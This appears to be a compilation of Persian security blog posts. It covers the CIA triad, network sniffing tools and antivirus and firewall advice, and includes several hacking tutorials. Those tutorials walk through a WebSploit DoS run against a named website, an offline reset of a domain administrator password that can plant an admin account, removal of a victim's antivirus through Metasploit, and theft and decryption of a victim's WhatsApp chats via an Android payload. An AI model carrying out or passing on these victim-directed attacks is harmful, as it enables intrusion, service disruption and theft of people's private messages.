■■■منظور از CIAدربحث امنیت اطلاعات چیست؟؟؟؟■■■

مفاهیم اصلی امنیتاطلاعات (CIA)

سازمانهای امروزی برای محافظت از اطلاعات و سیستمهای اطلاعاتی از دسترسی های غیر مجاز و جلوگیری از ایجاد تغییر، از بین رفتن یا دزدی داده ها بجز در مواردی که از سوی سازمان مجوز صادر شود اهمیت دارد. این کار را در یک کلام میتوان امنیت اطلاعات معنی کرد.

کامپیوترها می توانند قربانی عملیات های نهان باشند که متخصصین امنیت برای دفاع در برابر بدترین آنها، ۳ مفهوم اساسی امنیت اطلاعات را مطرح کرده اند.

  • محرمانگیConfidentiality
  • یکپارچگیIntegrity
  • در دسترس بودنAvailability

این ۳ مفهوم تحت عنوان CIA شناخته می شوند که در شکل زیر مشخص شده است:

برای بکارگیری مفاهیم محرمانگی، یکپارچگی و در دسترس بودن داده شما، سخت افزار، نرم افزار و ارتباطات سازمان می تواند ایمن شود.

مفهوم Confidentiality (محرمانگی):

جلوگیری از افشاء اطلاعات برای افراد غیرمجاز. به طور عموم این موضوع بر امنیت اجتماعی یا شناسایی خاصی دلالت دارد، اطلاعات مجوز درایور، حساب های بانکی و کلمات عبور و غیره از آن جمله است. برای سازمان ها می تواند شامل اطلاعات قبلی باشد اما در واقع نشان دهنده محرمانگی داده ها می باشد. برای ایجاد داده های محرمانه، سازمان باید سخت کار کند تا مطمئن شود که داده ها می توانند تنها توسط افراد مجاز دسترسی یابند.

مفهوم Integrity (یکپارچگی):

یکپارچگی بدین معناست که داده ها دستکاری نشده اند. اعتبار بخش پیش از تغییر داده ها در هر روشی که به صورت یکپارچه نگهداری کند لازم و ضروری می باشد. به عنوان مثال، اگر شخصی بخواهد فایل های مورد نیاز را حذف کند، حتی از روی عمد یا سهو، یکپارچگی آن فایل به خطر می افتد.

مفهوم Availability (در دسترس بودن):

در دسترس بودن بدین معناست که داده ها به منظور ذخیره سازی، پذیرش یا محافظت در دسترس باشند. این همچنین به این معناست که داده ها در برابر حملات ویروس ها نیز در دسترس هستند.

این ۳مفهوم باید همراه با امنیت سخت افزار، نرم افزار یا ارتباطات تأمین شوند. اصطلاح رایج دیگر AAA امنیت کامپیوتر می باشد. یعنی:

  • (Authentication) تأیید هویت
  • (Authorization) اختیار
  • (Accounting) حساب کاربری

(Authentication) تأیید هویت:  هنگامی که هویت شخص اثبات و توسط سیستم تأیید می شود. عموماً، این نیازمند یک شناسایی دیجیتالی برخی ترتیب ها، نام کاربری/کلمه عبور، یا سایر مفاهیم هویت سنجیمی باشد.

(Authorization) اختیار: هنگامی که یک کاربر به داده های معینی یا نواحی ساختمان قابل دسترس است اختیار پس از تأیید هویت اتفاق می افتد و می تواند به روش های متعددی شامل مجوزها، لیست های کنترل دسترس، زمان، روز و سایر محدودیت های لاگین و فیزیکی تعیین شود.

(Accounting) حساب کاربری: برای ردیابی داده ها، استفاده از کامپیوتر و منابع شبکه می باشد. اغلب به معنای لاگین کردن، حسابرسی و مانیتور کردن داده ها و منابع است، دارای حساب کاربری کردن امروزه به سرعت به یکی از مهمترین مفاهیم امنیت شبکه تبدیل شده است.

مفهوم AAA همچنین باید به هر برنامه امنیتی توری یافته بپیوندد، گفتنی است پروتکل های تأیید هویت متعددی بر اساس مفهوم AAA وجود دارد همانند TACACS4,TACACS,RADIUS. همچنینAAAنوعی از سرور استفاده شده در شبکه های بی سیمCDMAاست.

■■■درخصوصSNIFFINGیاهمان حمله شنود بیشتربدانیم■■■

Sniffing فرایند نظارت و ضبط تمام بسته های عبوری از یک شبکه با استفاده از برخی ابزارها میباشد.

احتمال این بسیار زیاد است که اگر مجموعه ای از پورت سوئیچ های سازمانی باز باشند، حتی یکی از کارمندان خود سازمان نیز می تواند تمام ترافیک شبکه را شنود کند. و یا اینکه هر کسی که دسترسی فیزیکی به شبکه دارد می تواند با استفاده از کابل اترنت به شبکه وصل شود یا به صورت بی سیم به آن شبکه متصل شود و ترافیک کل شبکه را شنود کند.

به عبارت دیگر، Sniffing به شما این امکان را می دهد تا بتوانید انواع ترافیک عبوری از یک شبکه را به صورت مخفیانه مشاهده کنید. چه در شبکه های محافظت شده و چه در شبکه های غیر محافظت شده.

چه چیزی می تواند شنود(sniff) شود؟

می توان اطلاعات حساسی را که در لیست زیر قرار داده ایم را شنود کرد:

  • ترافیک ایمیل (Email traffic)
  • رمزهای عبور اف تی پی (FTP passwords)
  • ترافیک وب (Web traffics)
  • گذرواژههای تلنت (Telnet passwords)
  • پیکربندی روتر (Router configuration)
  • جلسات گفتگو (Chat sessions)
  • ترافیک دی ان اس (DNS traffic)

انواع Sniffing

Sniffing می تواند فعال(Active) یا غیر فعال(Passive) باشد.

حالت غیر فعال(Passive) در Sniffing

در اسنیف غیرفعال، ترافیک قفل شده است و به هیچ وجه تغییری نخواهد کرد. نفوذگر در این حالت فقط میتواند ترافیک را شنود کند. و همچنین بر روی دیوایس های Hub(دستگاهی که سیستم ها را در شبکه محلی به هم وصل میکند) رخ میدهد. به این دلیل که در یک دستگاه Hub، ترافیک به تمام پورت ها ارسال می شود. در شبکه ای که از hub ها برای اتصال سیستم ها استفاده می کند، تمام میزبان ها در شبکه می توانند ترافیک را ببینند. بنابراین، مهاجم می تواند به راحتی ترافیک را دریافت کرده و آنرا نظارت کند.

خبر خوب این است که Hubها امروزه منسوخ شده اند و بیشتر شبکه های مدرن از سوئیچ استفاده می کنند. از این رو، اسنیف Passive زیاد موثر نخواهد بود.

حالت فعال(Active) در Sniffing

در اسنیف فعال، ترافیک نه تنها قفل شده بلکه نظارت هم میشود، ولی ممکن است توسط هکر تغییر داده شود. Sniffing فعال برای شنود یک شبکه مبتنی بر switch(دستگاهی که چندین سیستم را از طریق شبکه lan به هم متصل میکند) استفاده می شود.

تکنیک های Sniffing فعال عبادتند از:

  • MAC Flooding
  • DHCP Attacks
  • DNS Poisoning
  • Spoofing Attacks
  • ARP Poisoning

پروتکل هایی که تحت تأثیر حملات Sniffing قرار دارند

  • HTTP – پروتکلی است که برای ارسال متن به کار میرود بدون استفاده از هیچ گونه رمزنگاری.
  • SMTP – اساسا در انتقال ایمیل ها مورد استفاده قرار می گیرد. این پروتکل کارآمد است، اما هیچگونه حفاظت در برابر sniffing را شامل نمی شود.
  • NNTP – این پروتکل برای تمامی ارتباطات استفاده می شود، اما اشکال اصلی این است که داده ها و حتی پسوردهای بر روی شبکه به عنوان متن واضح(clear text) ارسال می شوند.
  • POP – برای دریافت ایمیل از سرور استفاده می شود. این پروتکل هیچ محافظتی در برابر sniffing ندارد.
  • FTP – برای ارسال و دریافت فایل استفاده می شود، اما هیچ ویژگی امنیتی ارائه نمی دهد. تمام داده ها به صورت متن ساده ارسال می شوند.
  • IMAP – عملکردهای آن همانند SMTP  است، اما در برابر اسنیف بسیار آسیب پذیر است.
  • Telnet – همه چیز (نامهای کاربری، رمزهای عبور و…) را بر روی شبکه به عنوان متن ساده(clear text) ارسال می کند و از این رو می توان به راحتی آن را اسنیف کرد.

انواع پروتکل های شبکه و کارایی آنها

ابزارهای پرکاربرد برای Sniffing

ابزارهای زیادی برای اسنیف شبکه وجود دارد و همه آنها ویژگی های خاص خود را دارند تا هر کس تجزیه و تحلیل ترافیک و اطلاعات را بر اساس سلیقه خود به دست آورد.

  • BetterCAP – یک ابزار قدرتمند، انعطاف پذیر و قابل حمل است که برای انجام انواع مختلف حملات MITM علیه شبکه، دستکاری HTTP، HTTPS و ترافیک TCP به صورت لایو به کار میرود.
  • Ettercap – یک مجموعه جامع برای حملات مرد میانی است. دارای قابلیت هایی همچون اسنیف ارتباطات زنده، فیلتر کردن محتوا و… میباشد.
  • Wireshark – یکی از معروف ترین ابزارهای sniffing به شمار میرود.دارای ویژگی های مهمی همچون، کمک به تجزیه و تحلیل ترافیک و اطلاعات میباشد.
  • Tcpdump – یکی از ابزارهای تجزیه و تحلیل ترافیک در خط فرمان شناخته شده است. توانایی پیگیری و مشاهده TCP / IP و دیگر بسته ها را در هنگام انتقال از طریق شبکه فراهم می کند.
  • WinDump – یک ابزار خط فرمانی است که برای نمایش اطلاعات هدر مناسب است.
  • Dsniff – مجموعه ای از ابزارهای طراحی شده برای حملات اسنیف با پروتکل های مختلف و با هدف سرقت پسوردها میباشد. Dsniff برای سیستم عامل های یونیکس و لینوکس طراحی شده و معادل کامل در سیستم عامل ویندوز ندارد.
  • EtherApe – این یک ابزار لینوکس / یونیکس است که برای نمایش گرافیکی اتصالات ورودی و خروجی سیستم طراحی شده است.
  • NetWitness NextGen – یک Sniffer مبتنی بر سخت افزار، به همراه ویژگی های زیادی میباشد و برای نظارت و تجزیه و تحلیل تمام ترافیک در شبکه طراحی شده است. این ابزار توسط FBI و دیگر سازمان های اجرای قانون استفاده می شود.

یک نفوذگر می تواند از هر یک از این ابزارهای تست نفوذ برای تجزیه و تحلیل ترافیک در شبکه استفاده کند و اطلاعات را تجزیه و تحلیل کند.

■■■آموزش حمله DOSوDDOSبا کالی لینوکس■■■

حملات dos,ddos حملاتی هستند که باعث اختلال در عملکرد یک شبکه،برنامه و یا یک وبسایت میشوند. برای آشنایی بیشتر میتوایند به این لینک مراجعه کنید. در این آموزش با ابزاری قدرتمند آشنا خواهیم شد که انجام این حملات رو برای نفوذگران اسان کرده است.

معرفی ابزار WebSploit

WebSploit یک پروژه منبع باز است که برای اسکن، تجزیه و تحلیل سیستم ها،پیدا کردن انواع مختلف آسیب پذیری ها و انجام برخی حملات به کار میرود. در لیست زیر به برخی از کاربردهای مهم این ابزار اشاره می کنیم:

ما در آموزش خود از ماژول Web Killer استفاده خواهیم کرد. شایان ذکر است که این ابزار به صورت پیشفرض در سیستم عامل کالی لینوکس نصب نمی باشد پس برای نصب آن میتوانید از دستورات زیر در محیط ترمینال استفاده کنید:

 

1

2

3

git clone https://github.com/websploit/websploit.git

 

cd websploit

بعد از نصب ابزار وب اسپلویت، میتوانید برای اجرای آن، در ترمینال و پوشه مربوطه، دستور زیر را تایپ کنید:

 

1

./websploit

همچنین برای مشاهده ماژول های این فریم ورک میتوانید از دستور زیر استفاده کنید:

 

1

show modules

همانطور که پیش تر اشاره کردم ما از ماژول network web killer برای انجام آزمایش خود استفاده میکنیم. که نحوه فراخوانی و استفاده از آن به صورت زیر میباشد:

ابتدا ماژول مورد نظر خود را فراخوانی میکنیم:

 

1

use network/web killer

سپس میتوانیم با دستور زیر، اطلاعات لازم برای استفاده کردن از ماژول را مشاهده کنیم:

 

1

show options

در مرحله بعد تارگت آزمایشی خود را برای انجام تست نفوذخود در برنامه ست می کنیم:

 

1

set TARGET kaliboys.com

سپس میتواینم با تایپ دستور run تست نفوذ خود را شروع کنیم.

امیدوارم که این مطلب آموزش هم براتون مفید بوده باشه. 

■■■آموزش ریست کردن پسورد دامین در سرور2003■■■

همانطور که می دانید پس از نصب ویندوز سرور 2003 ابتدا با اکانت کاربری Local Administrator وارد سیستم می شوید. در صورتی که پسورد این User را فراموش کنید ، نرم افزار های زیادی وجود دارند که می توانند پسورد این اکانت Local را حذف کنید و یا تغییر دهید ؛ مانند نرم افزارهای Windows Password Remover ،Reset Windows Password و بسیاری دیگر.

اما در صورتی که بر روی سرور 2003 اقدام به نصب سرویس Active Directory نمایید،Active Directory مدیریت User ها را در اختیار خواهد گرفت،در این صورت پسورد Administrator به صورتDomain خواهد بود و شما در صورتی که پسورد سرور را فراموش کرده باشید باید پسورد Domain Administrator را ریست کنید که با پسورد Local Administrator متفاوت است. نرم افزارهایی که در بالا نام برده شد قادر به ریست کردن پسورد Domain نیستند و فقط پسورد Local را ریست می کنند. بنابراین برای ریست کردن پسوردDomain Administrator چه باید کرد؟

یکی از نرم افزارهایی که توانایی ریست کردن پسورد Domain Administrator را داراست نرم افزار Windows Password Unlocker Enterprise می باشد که با استفاده از آن هم می توانید پسورد هایی که به صورت Local هستند ریست کنید و همینطور پسوردهایی که به صورت Domain هستند. در ادامه نحوه انجام این کار را به شما عزیزان خواهیم آموخت.

1-     ابتدا نرم افزار Windows Password Unlocker Enterprise 6 را لینک زیر دانلود نمایید و بر روی یک کامپیوترنصب کنید.

لینک دانلود نرم افزار Windows Password Unlocker Enterprise 6

     2-   نرم افزار را اجرا کنید.           

01 -ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 در صورتی که می خواهید پسورد Local را ریست کنید Local Accunt و درصورتی که می خواهید پسورد Domain را ریست کنید تب Domain Administrator را انتخاب نمایید.

02-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 3-     در مرحله بعد یابد فایل های ریست کننده پسورد را بر روی CD\DVD و یا بر روی Flash رایت کنید. ( و یا هر دو ! )

03-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 4-     در مرحله بعد باید بر روی سروری که می خواهید پسورد آن را ریست کنید با CD/DVD یا Flash که رایت کردید Boot کنید.

 

05-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

06-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 

5-     در این مرحله باید روش ریست کردن پسورد سرور 2003 را انتخاب کنید.

برای انجام این کار دو روش در نظر گرفته شده.

07-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 -      در صورتی که روش اول را انتخاب کنید پسورد Domain Administrator بهPa123456 تغییر داده می شود. ( توجه کنید کارکتر P به صورت بزرگ نوشته شده )

08-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 -      در صورتی که روش دوم را انتخاب کنید یک User جدید با دسترسیAdministrator در سرور ساخته خواهد شد. که نام آن passkillerو پسورد آن هم مثل روش قبل Pa123456 خواهد بود. ( توجه کنید کارکتر P به صورت بزرگ نوشته شده )

09-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 

6-     در پایان CD\DVD یا Flash را از سرور جدا کنید و سرور را ریست کنید.

  -  در صورتی که از روش اول استفاده کردید در قسمت کاریری نام کاربریAdministrator و پسورد Pa123456 را وارد کنید.توجه کنید که نام Domain را هم در پایین صفحه در قسمت Log on to انتخاب شده باشد.

            -      در صورتی که از روش دوم استفاده کردید در قسمت کاربریpasskiller و در قسمت پسورد Pa123456 را وارد نمایید.

10-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 همانطور که در تصویر زیر مشاهده می کنید با استفاده از روش دوم اکانتpasskiller در Active Directory اضافه شده است.

11-ریست کردن پسورد دامین پسورد سرور پسورد Administrator - هیوا شبکه

 

البته لازم به ذکر است که با این نرم افزار می توانید پسورد سایر نسخه های ویندوز را نیز ریست نمایید

■■■آموزش حذف آنتی ویروس سیستم قربانی بااستفاده ازمتااسپلویت■■■

همیشه درگیری بسیار شدیدی بین سیستم های امنیتی و هکر ها وجود داشته ، سیستم های امنیتی همیشه سعی در حفظ  امنیت داشتن و هکر ها به دنبال راهی برای دورزدن این سیستم های امنیتی و در این موضوع هکر ها همیشه یک قدم جلوتر هستن 🙂

 

 

امروزه میشه گفت روی اکثر سیستم عامل ها سیستم های امنیتی وجود داره و وجود این سیستم های امنیتی باعث میشه که هکر به راحتی نتونه کارهاشو روی سیستم عامل انجام بده

 

در این آموزش ما میخواهیم با کمک دستور wmic که یک دستور استاندارد در سیستم عامل ویندوز هست  انتی ویروس نصب شده روی سیستم قربانی رو حذف کنیم تا بتونیم به راحتی هر کاری که خواستیم روی سیستم عامل انجام بدیم و کسی نباشه اذیتمون کنه 🙂

 

 

 

 

من از جایی شروع میکنم که ما به سیستم عامل قربانی دسترسی گرفتیم در مطالب قبلی راجع به گرفتن دسترسی خیلی زیاد صحبت کردیم

 

 

 

 

 

بعد از گرفتن دسترسی من با دستور ps  بررسی میکنم ببینم چه انتی ویروسی (اینجا من از کلمه انتی ویروس استفاده میکنم چون این کلمه برای دوستان بیشتر جا افتاده است) رو این سیستم نصبه

 

 

 

 

در تصویر میبینید که انتی ویروس AVG روی سیستم نصبه برای اینکه من بتونم AVG رو پاک کنم باید دسترسیم رو ارتقاع بدم در مطالب گذشته راجب بالابردن سطح دسترسی در سیستم عامل ویندوز صحبت کردی

 

 

 

خب میرسیم به بخش جذاب کار من دستور shell رو میزنم تا وارد محیط خط فرمان سیستم قربانی بشم

 

 

 

با زدن دستور زیر میتونید تمامی نرم افزار های نصب شده برروی سیستم عامل قربانی رو ببینید

 

 

 

 

میبینید که در لیست اسم انتی ویروس AVG هم هست که ما میخواهیم حذفش کنیم پس دستور زیر رو برای حذف AVG وارد میکنیم (به جای AVG شما میتونید اسم هر نرم افزار دیگری رو برای حذف کردن وارد کنید)

 

 

 

خب کار تمومه انتی ویروس AVG از سیستم قربانی حذف شد همه چی امن امانه به راحتی به کارتون برسید

■■■روش هک کردن واتس آپ وچتهای آن■■■■

امروزه پیام رسان ها نقش مهمی در زندگی روزمره ما دارند و ما ساعت ها وقت خودمون رو در پیام رسان های مختلف میگذرونیم , یکی از پرطرفدارترین پیام رسان ها واتس اپ (WhatsApp) است که افراد بسیار زیادی در سرتاسر دنیا از این پیام رسان استفاده میکنن , در مطالب قبلی ما راجب روش های نفوذ به اکانت های واتس اپ صحبت کردیم (اگر اون مطلب رو ندید کلیک کنید) در این پست میخواهیم راجع به این صحبت کنیم که چگونه بعد از نفوذ به گوشی به چت های واتس اپ قربانی دسترسی پیدا کنیم ، تمامی این عملیات با گوشی اندرویدی انجام میشود و ما از ترموکس (Termux) استفاده میکنیم.

 

 

 

 

 

در قدم اول ما یک پیلود (Payload) اندرویدی میسازیم که برای قربانی ارسال کنیم  و از گوشیش دسترسی بگیریم

 

 

 

 

بعد از ساخت پیلود (Payload) ما متااسپلویت رو و حالت لیسنر قرار میدیم و بعد از اجرا پیلود (Payload) توسط قربانی ما به گوشیش دسترسی میگیریم

 

 

 

 

بعد از دسترسی گرفتن به گوشی با دستور زیر وارد پوشه whatsapp میشیم

 

 

 

 

بعد از اون وارد پوشه Databases میشیم

 

 

 

در این پوشه ما دیتابیس واتس اپ قربانی رو میبینیم ما باید این دیتابیس رو دانلود کنیم چون میخواهیم دیکریپت (Dcrypt) کنیم (به تاریخ فایل دقت کنید و جدیدترین فایل رو از نظر تاریخ دانلود کنید)

 

 

 

 

بعد از دانلود دیتابیس ما وارد سایت whatcrypt.com میشیم و روزی گزینه Decrypt WhatsApp Database کلیک میکنیم

 

 

 

 

 

 

کافیه روی گزینه Choose file کلیک کنید و دیتابیسی که در مراحل قبلی دانلود کردیم رو بهش بدیم و بعد روی گزینه Process /Download Zip کلیک کنید

 

 

 

 

 

بعد از انتخاب گزینه Process /Download Zip با این صفحه روبرو میشید که از شما میخواد فایل Key رو بهش بدید تا عملیات دیکریپت (Dcrypt) رو انجام بده فایل Key در مسیر data/data/com.whatsapp/files/key/ قرار داره و شما برای دسترسی به این فایل باید حتما گوشی قربانی روت (ROOT) باشه در غیر اینصورت دسترسی نخواهید داشت 

 

 

برای معرفی فایل Key هم روی گزینه Upload Your Crypt 6-12 Key کلیک کنید و فایل رو بهش بدید و بعد عملیات دیکریپت انجام خواهد شد

■■چگونه یک چتر دفاعی قدرتمند برای سیستمهای کامپیوتری خود داشته باشیم■■■

اگر یک کامپیوتر شخصی دارید، شما یک هدف بالقوه برای هکرها به شمار می‌روید. در نتیجه به یک نرم‌افزار امنیتی قدرتمند نیاز دارید. نزدیک به یازده سال پیش مایکروسافت ویندوز ویستا را منتشر کرد. مایکروسافت همراه با عرضه ویستا قابلیت‌های امنیتی سیستم‌عامل‌ خود را به‌گونه‌ای بهبود بخشید تا این سیستم‌عامل بتواند در برابر هکرها از کاربران خود محافظت کند. به عبارت دقیق‌تر ویستا را می‌توان شروعی جدید در زمینه یکپارچگی قابلیت‌های امنیتی سیستم‌عامل‌های مایکروسافت توصیف کرد. پیشرفت‌هایی که اکنون به بالاترین سطح خود رسیده‌اند و اکنون شاهد هستیم که ویندوز 10 با تکیه بر پشتوانه‌ای چند ده ساله توانسته در برابر بسیاری از تهدیدات از کاربران محافظت به عمل آورد. با وجود این شما هنوز هم به محصولات امنیتی ارائه شده از سوی تولیدکنندگان نرم‌افزارهای امنیتی نیاز دارید. برای این منظور دو راهکار پیش روی شما قرار دارد، اول آنکه یک محصول استاندارد را از فروشنده‌ای خریداری کرده و حق اشتراک سالیانه‌ای را بابت آن پرداخت کنید. دوم اینکه یک مجموعه امنیتی سفارشی را با اتکا بر محصولات تجاری یا رایگانی که در دسترس دارید ایجاد کنید. مقاله‌ای که در حال خواندن آن هستید قصد دارد راهکار دوم را مورد بررسی قرار دهد.

اگر بخواهیم تعریفی ساده، کوتاه و جذاب از نرم‌افزارهای ضدویروس ارائه کنیم، باید بگوییم نرم‌افزارهای ضدویروس عملکردی مشابه با سامانه‌های پدافند هوایی دارند. درست زمانی که بدافزار یا ویروسی همانند یک موشک به سمت سامانه کامپیوتری یا زیرساخت‌های ارتباطی سازمان شما شلیک/هدایت می‌شود این نرم‌افزارهای دفاعی هستند که بدافزار را رهگیری کرده، به شما اطلاع داده و آن‌را نابود یا قرنطینه می‌کنند. 

مزایا و معایب ضدویروس‌های رایگان

بدون شک حرکت به سمت نرم‌افزارهای رایگان صرفه‌جویی اقتصادی به همراه دارد، اما در مقابل قادر نیست یک راه‌حل جامع در اختیار همه کاربران قرار ‌دهد. زمانی که یک ضدویروس پولی را خریداری می‌کنید، شما به‌طور معمول از سرویس پشتیبانی که از سوی شرکت ارائه می‌شود بهره‌مند می‌شوید. از سوی دیگر به‌کارگیری محصولات رایگان به این معنا است که در اکثر مواقع اگر شما با مشکلی روبرو شدید، برای حل مشکل باید روی توانایی‌های شخصی خود حساب باز کنید. در نتیجه شما برای انتخاب بهترین ابزارهای رایگانی که در بازار وجود دارد باید از تکنیک آزمون و خطا استفاده کنید. بسته‌هایی که به شکل پریمیوم ارائه می‌شوند از آن جهت مورد توجه سازمان‌ها قرار دارند که بدون دردسر راه‌حل‌های امنیتی یکپارچه را ارائه می‌کنند. راهکارهای ارائه شده از سوی این محصولات در بیشتر موارد بدون شکاف بوده و به راحتی قابل استفاده است. مشکل دیگری که ابزارهای رایگان دارند به نوارابزارهای مربوط به مرورگرها، افزونه‌ها یا برنامه‌های دسکتاپی ثالثی باز می‌گردد که روی سامانه شما نصب می‌کنند، در صورتی که شما ممکن است هیچ‌گاه به این برنامه‌ها نیازی نداشته باشید. همچنین فراموش نکنید که این ابزارها همراه با تبلیغاتی که سازندگان برای تامین منابع مالی خود به آن‌ها وابسته‌اند، در اختیار شما قرار می‌گیرند. اما این حرف‌ها به معنای آن نیست که ما نمی‌توانیم محصولات ایده‌آلی را در این حوزه پیدا کرده و یک راه‌حل امنیتی خوب را بر پایه آن‌ها طراحی کنیم. ما با کمی تحقیق و البته تجربه قبلی به خوبی می‌توانیم یک سامانه سفارشی ایده‌آل را پیاده‌سازی کنیم.

بهترین نرم‌افزارهای ضدویروس رایگان

نرم‌افزارهای ضدویروس یکی از مولفه‌های کلیدی بسته‌های امنیتی به شمار می‌روند. این نرم‌افزارها مهم‌ترین ابزاری هستند که از شما در برابر بدافزارها محافظت می‌کنند. ویندوز ضدویروس از پیش ساخته شده خاص خود به نام ویندوز دیفندر را دارد. قابلیتی که در اختیار کاربران ویندوز 8.1 و 10 قرار دارد. کاربران ویندوز 7 نیز می‌توانند بسته امنیتی Security Essentials را نصب کنند هر چند پیشنهاد می‌شود که دیگر با ویندوز 7 خداحافظی کنید. ‌راه‌حل ارائه شده از سوی ویندوز سطحی خوب از پایداری و امنیت را ارائه می‌کند، اما شرکت‌های ثالثی که نرم‌افزارهای امنیتی را مورد آزمایش قرار می‌دهند، کشف کرده‌اند که این ضدویروس در مقایسه با بسته‌های امنیتی ثالث دارای کاستی‌هایی است. در نتیجه اگر یک کاربر آگاه حوزه امنیت باشید، به خوبی می‌دانید که برای اجرای یک اسکن خوب راهکارهای قدرتمندتری همچون Malwarebytes پیش روی شما قرار دارد. زمانی که صحبت از ضدویروس‌های رایگان به میان می‌آید شما گزینه‌هایی به مراتب بهتر از دیفندر در اختیار دارید. (شکل یک)

چگونه یک چتر دفاعی قدرتمند برای سامانه‌های کامپیوتری ایجاد کنیم؟

Avira Antivirus Free Edition و Bitdefender Antivirus Free Edition دو محصول رایگان ارزشمند در این زمینه هستند. آزمایشگاه آلمانی AV-Test که در زمینه آزمایش نرم‌افزارهای ضدویروس به فعالیت اشتغال داشته و به‌طور مستمر گزارشی در ارتباط با قابلیت‌های ضدویروس‌ها ارائه می‌کند، در گزارش سال گذشته خود اعلام کرده که دو محصول پولی آویرا و بیت‌دیفندر در زمینه حفاظت، عملکرد و قابلیت استفاده هنوز هم جزء بهترین‌ها هستند. هر دو محصول با فاصله کمی از یکدیگر به خوبی می‌توانند عملکرد نرم‌افزارهای مخرب را متوقف کرده و سایر تهدیدات را شناسایی کنند. البته در آزمایشی که AV-Test سال گذشته انجام داد، آویرا در زمان اسکن نرم‌افزارهای قانونی یک هشدار کاذب را در ارتباط با یک نرم‌افزار معتبر ارائه کرد و یک نرم‌افزار معتبر را به عنوان یک بدافزار شناسایی کرد. نسخه‌های رایگان این محصولات نیز عملکردی مشابه با نسخه تجاری دارند. پس از این دو محصول Avast Free و Panda Free Antivirus قرار دارند. مهم نیست کدام‌یک از ضدویروس‌های رایگان را انتخاب می‌کنید، اصل مهمی که باید به آن توجه داشته باشید این است که ضدویروس انتخابی شما باید بتواند حملات روزصفر را تشخیص دهد. برنامه‌های ضدویروسی که بتوانند حملات روز صفر را متوقف کنند در مواجه با نرم‌افزارهای مخرب یا بدافزارهای جدیدتر عملکرد بهتری داشته و مانع از آن می‌شوند تا بدافزار به سرعت گسترش پیدا کرده و خسارت‌های سنگینی به بار آورد. 

از یک برنامه ضدویروس دوم استفاده کنید

حتی بهترین نرم‌افزارهای ضدویروسی سنتی نیز برای حذف بدافزارها و شناسایی بدافزارهایی که در قلب سامانه‌ها مستتر شده‌اند به زمان قابل توجهی نیاز دارند. با توجه به این نکته ایده بدی نیست که از یک برنامه ضدویروس ثانویه نیز استفاده کنید. نسخه رایگان Malwarebytes Anti-Malware یک لایه امنیتی اضافی در برابر تهدیدات اینترنتی به وجود می‌آورد. (شکل دو) با توجه به اینکه نسخه رایگان یک محافظت بلادرنگ را ارائه نمی‌کند، در نتیجه برای حفاظت از یک سامانه نباید به عنوان ضدویروس اصلی مورد استفاده قرار گیرد. شما می‌توانید از این محصول امنیتی به شکل موازی در کنار سایر برنامه‌های ضدویروس به منظور انجام یک اسکن هوشمند دستی استفاده کنید. این برنامه ضدویروسی به واسطه اینکه بالاترین سطح حفاظتی در برابر حملات روزصفر را ارائه می‌کند شهرت پیدا کرده است. این محصول در بعضی موارد قادر است آلودگی‌هایی را شناسایی کند که سایر ضدویروس‌ها در شناسایی آن‌ها ناتوان هستند. محصول ارزشمند دیگری که در این زمینه وجود دارد Norton Power Eraser است. یک ابزار رایگان که برای شناسایی گونه خاصی از بدافزارها موسوم به ترس‌افزارها (scareware) مورد استفاده قرار می‌گیرد. این گونه بیشتر آیتم‌های مزاحم مخرب را به شما نشان داده و سعی می‌کنند شما را ترغیب کنند تا برنامه‌های ضدویروس جعلی را خریداری کنید. سیمانتک هشدار می‌دهد که محصول یاد شده تنها یک پویشگر بدافزارها بوده و گاهی اوقات ممکن است یک برنامه قانونی را به عنوان یک بدافزار شناسایی کند. در نتیجه شما باید به عنوان آخرین راهکار دفاعی از آن استفاده کنید. اما هنوز هم سلاح قدرتمندی است که باید به زرادخانه امنیتی خود اضافه کنید. 

چگونه یک چتر دفاعی قدرتمند برای سامانه‌های کامپیوتری ایجاد کنیم؟
شکل 2

از یک دیوارآتش استفاده کنید

ویندوز یک دیوارآتش داخلی از پیش طراحی شده را در اختیار کاربران قرار می‌دهد. گزینه‌های پایه این محصول خوب بوده و در پس‌زمینه ویندوز بدون جلب توجه خاصی کار می‌کنند. اما زمانی که یک ارتباط مشکوک را تشخیص دهد این موضوع را به کاربر اطلاع می‌دهد، اما به عنوان یک راهکار کاملا حرفه‌ای نباید روی آن حساب باز کنید. با این حال، ایده عاقلانه‌ای است که دیوارآتش GlassWire را نصب کنید. (شکل سه) این برنامه قادر است ارتباطات خروجی را به خوبی مسدود کند. البته به شرطی که موارد مشکوک را برای برنامه مشخص کرده باشید. به‌طور مثال ممکن است یک برنامه جدید را نصب کنید، اما احساس می‌کنید که ارتباطات این نرم‌افزار با اینترنت ممکن است برای شما دردسرآفرین شود. در این حالت به سادگی می‌توانید این برنامه را به فهرست دیوارآتش GlassWire اضافه کنید. اما برنامه فوق قابلیت‌هایی به مراتب فراتر از دیوارآتش ویندوز ارائه می‌کند. دیوارآتش ویندوز در برخی موارد ارتباطات خارج شونده از یک سامانه را متوقف نکرده است که این موضوع جای بحث دارد. بزرگ‌ترین مزیت GlassWire غنی بودن این برنامه از حیث اطلاعات است. به‌طور پیش‌فرض، هشدارهای این برنامه در ارتباط با موارد مشکوک در سمت راست پایین دسکتاپ نشان داده می‌شود که اعلام می‌دارد برنامه‌ای در نظر دارد یک ارتباط اینترنتی را آغاز کند. هر زمان برنامه‌ای فرآیند به‌روزرسانی را انجام می‌دهد شما هشداری در این زمینه دریافت می‌کنید. این هشدار به ویژه زمانی مفید است که شما انتظار نداشتید یک برنامه به‌طور خودکار اینکار را انجام دهد. اتفاقی که ممکن است ردپایی از نفوذ در آن مستتر باشد. اما توجه داشته باشید که GlassWire از نمایش اعلان‌ها در Action Center ویندوز استفاده نمی‌کند. اگر این برنامه را باز کنید اطلاعات به مراتب بیشتری را در قالب نمودارهایی مشاهده می‌کنید که ترافیک بلادرنگ در جریان را روی کامپیوتر شخصی نشان می‌دهند. همچنین نموداری به شما نشان داده می‌شود که اعلام می‌دارد چه برنامه‌ای بیشترین پهنای باند را استفاده می‌کند. 

